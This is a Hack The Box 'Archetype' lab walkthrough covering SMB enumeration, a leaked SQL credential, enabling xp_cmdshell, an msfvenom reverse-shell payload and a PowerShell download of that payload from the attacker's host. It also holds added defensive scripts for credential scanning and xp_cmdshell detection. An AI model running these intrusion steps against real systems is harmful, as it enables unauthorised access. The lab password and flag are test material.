Target: Archetype
Difficulty: I personally found it challenging
The author uses Kali Linux as the penetration testing platform. On Kali Linux, first establish a VPN connection to the Hack The Box site with openvpn and obtain the IP address of the target Archetype instance:
# openvpn starting_point_jasonhuawen.ovpn
# nmap -sV 10.129.5.176
Task 1: Which TCP port is hosting a database server?
Approach: scan the target Archetype with nmap and look for the port the database service is running on:
# nmap -sV 10.129.5.176
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 00:49 EDT
Nmap scan report for 10.129.175.76
Host is up (0.22s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.98 seconds
Answer: 1433
Task 2: What is the name of the non-Administrative share available over SMB?
Approach: the nmap results show that the target is running an SMB file sharing service, so try listing the shares with smbclient:
# smbclient -L 10.129.5.176
Enter WORKGROUP\root's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
smbclient -L 10.129.5.176 lists the shares; names ending in $ are administrative shares that require administrator privileges.
Answer: backups
Task 3: What is the password identified in the file on the SMB share?
Approach: next, connect to the target's backups share with smbclient (no password is needed):
# smbclient //10.129.5.176/backups
The share holds only one file. Download it, open it locally, and the username and password are visible:
# smbclient //10.129.5.176/backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

		5056511 blocks of size 4096. 2605198 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> quit

┌──(root💀kali)-[~]
└─# cat prod.dtsConfig
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
Username: ARCHETYPE\sql_svc
Password: M3g4c0rp123
Answer: M3g4c0rp123
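The finding in this task is a clear-text password inside an SSIS .dtsConfig file left on a readable share. The check below is an added example, not part of the original write-up: a small scanner that parses such a file, reports every connection string that embeds a Password/PWD value, and redacts the value for reporting. The XML is a constructed sample modelled on the file shown above; the key names it looks for (Password, PWD, User ID, UID, Persist Security Info) are standard OLE DB connection-string keys.

```python
# Added example (not from the original write-up): find clear-text credentials
# in SSIS .dtsConfig files, the kind of check a defender runs over backup shares.
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the prod.dtsConfig file in the write-up,
# plus a second connection that uses integrated auth and must not be flagged.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=dbsrv01;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

# Connection-string keys that carry a secret (OLE DB / SQLNCLI naming).
SECRET_KEYS = ("password", "pwd")


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased key name."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def find_embedded_credentials(xml_text):
    """Return one finding per ConfiguredValue that holds a clear-text password.

    Each finding records the package path, the account the password belongs to,
    and whether Persist Security Info=True (the password then stays readable
    on the open connection object as well as in the file)."""
    root = ET.fromstring(xml_text)
    findings = []
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        secret_key = next((k for k in SECRET_KEYS if pairs.get(k)), None)
        if secret_key is None:
            continue
        findings.append({
            "path": conf.get("Path", ""),
            "user": pairs.get("user id") or pairs.get("uid") or "<unknown>",
            "key": secret_key,
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
        })
    return findings


def redact_connection_string(value):
    """Mask Password/PWD values so the file can be quoted safely in a report."""
    return re.sub(r"(?i)\b(password|pwd)\s*=\s*[^;]*", r"\1=***", value)


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_DTSCONFIG):
        print(f"{f['path']}: clear-text {f['key']} for {f['user']} "
              f"(Persist Security Info={f['persist_security_info']})")
```

Run over every .dtsConfig (and .dtsx, which can carry the same ConnectionString properties) found on file shares; the fix on the application side is to move the connection to Windows authentication, as the second sample connection does, rather than to rotate the password and leave the file in place.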
Task 4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
Approach: this task mentions the Impacket toolkit, which turned out not to be installed on Kali Linux. A quick Google search shows the installation is simple:
# git clone https://github.com/CoreSecurity/impacket.git
# cd impacket/
# python3 setup.py install
The task asks about establishing a connection to Microsoft SQL Server, so the script should be mssqlclient.py.
Next, use Impacket's mssqlclient.py script to connect to the SQL Server database (the username and password come from the file downloaded with smbclient earlier):
# python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
The connection to the database succeeds:
┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples]
└─# ls
addcomputer.py  findDelegation.py   getST.py       lookupsid.py      nmapAnswerMachine.py  raiseChild.py     rpcmap.py      smbexec.py     split.py
atexec.py       GetADUsers.py       getTGT.py      mimikatz.py       ntfs-read.py          rbcd.py           sambaPipe.py   smbpasswd.py   ticketConverter.py
dcomexec.py     getArch.py          GetUserSPNs.py mqtt_check.py     ntlmrelayx.py         rdp_check.py      samrdump.py    smbrelayx.py   ticketer.py
dpapi.py        Get-GPPPassword.py  goldenPac.py   mssqlclient.py    ping6.py              registry-read.py  secretsdump.py smbserver.py   wmiexec.py
esentutl.py     GetNPUsers.py       karmaSMB.py    mssqlinstance.py  ping.py               reg.py            services.py    sniffer.py     wmipersist.py
exchanger.py    getPac.py           kintercept.py  netview.py        psexec.py             rpcdump.py        smbclient.py   sniff.py       wmiquery.py

┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.5.176 -windows-auth
Impacket v0.9.25.dev1+20220323.180407.ff322697 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Answer: mssqlclient.py
Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
Answer: xp_cmdshell
Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
Answer: winPEAS (the well-known Windows enumeration script for discovering privilege escalation paths)
Task 7: What file contains the administrator's password?
Approach: a reverse shell has to be established, followed by privilege escalation. First enable xp_cmdshell from the SQL prompt:
SQL> enable_xp_cmdshell;
SQL> reconfigure
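Enabling xp_cmdshell is the step a defender has the best chance of catching: SQL Server writes a line to its ERRORLOG every time sp_configure changes an option, in the form "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install." The detection below is an added example, not part of the original write-up; the log lines are constructed samples in the ERRORLOG layout (timestamp, source such as spidNN or Logon, message), and the list of watched options is my choice.

```python
# Added example (not from the original write-up): alert when xp_cmdshell or a
# similar option is switched on, by parsing SQL Server ERRORLOG lines.
import re

# Constructed sample in ERRORLOG layout: a login, the two sp_configure changes
# made by enable_xp_cmdshell, and a later change that turns it back off.
SAMPLE_ERRORLOG = """\
2020-01-20 07:24:58.01 Logon       Login succeeded for user 'ARCHETYPE\\sql_svc'. Connection made using Windows authentication. [CLIENT: 10.10.14.218]
2020-01-20 07:25:10.33 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 07:25:11.12 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 07:31:02.90 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# ERRORLOG line: "<date> <time> <source> Configuration option '<name>' changed from <old> to <new>."
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<src>\S+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# sp_configure options whose enabling should page someone (my selection;
# all three allow code or command execution from inside the database engine).
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


def parse_config_changes(log_text):
    """Return one dict per sp_configure change recorded in the log text."""
    changes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        changes.append({
            "time": m.group("ts"),
            "source": m.group("src"),      # spid that issued the change
            "option": m.group("option"),
            "old": int(m.group("old")),
            "new": int(m.group("new")),
        })
    return changes


def alerts(log_text):
    """Watched options switched from off (0) to on (1), as (time, spid, option).

    Turning an option off again is deliberately not alerted: the spid in the
    alert is what lets you join the change to the login that made it."""
    return [
        (c["time"], c["source"], c["option"])
        for c in parse_config_changes(log_text)
        if c["option"] in WATCHED_OPTIONS and c["old"] == 0 and c["new"] == 1
    ]


if __name__ == "__main__":
    for when, spid, option in alerts(SAMPLE_ERRORLOG):
        print(f"{when} {spid}: '{option}' enabled")
```

The ERRORLOG lives in the instance's Log directory; feeding it to this parser (or the equivalent SIEM rule) catches the enable step even when the attacker has the SQL service account's password, as here, because the log entry is written by the engine regardless of who issued the command. The command later run through xp_cmdshell appears on the host side as a child process of sqlservr.exe, which process-creation auditing can flag separately.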
Then set up the reverse connection. The payload has to be generated and uploaded to the target, so first generate it with msfvenom:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.218 -f exe -o jason.exe
# 10.10.14.218 is the tun interface address that Kali Linux gets after the VPN connection; it is the listener address for the reverse shell
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: jason.exe
The key step is getting the jason.exe payload onto the target machine.
xp_cmdshell can run a command that downloads the payload onto the target, with an HTTP server running locally on Kali Linux (using Python's http module).
First change into a directory on the target where execution is permitted, such as the Public directory:
The payload was uploaded to the target successfully:
SQL> xp_cmdshell "powershell wget http://10.10.14.8/jason.exe -OutFile c:\\Users\Public\\jason.exe"
Then run jason.exe on the target.
The reverse shell connected back to Kali Linux successfully.
Next, prepare the privilege escalation tool winPEAS by downloading it locally on Kali Linux:
# wget https://github.com/carlospolop/PEASS-ng/releases/download/20220320/winPEASx86.exe
Then upload winPEAS to the target through meterpreter and run it:
The user flag was obtained successfully: 3e7b102e78218e935bf3f4951fec21a3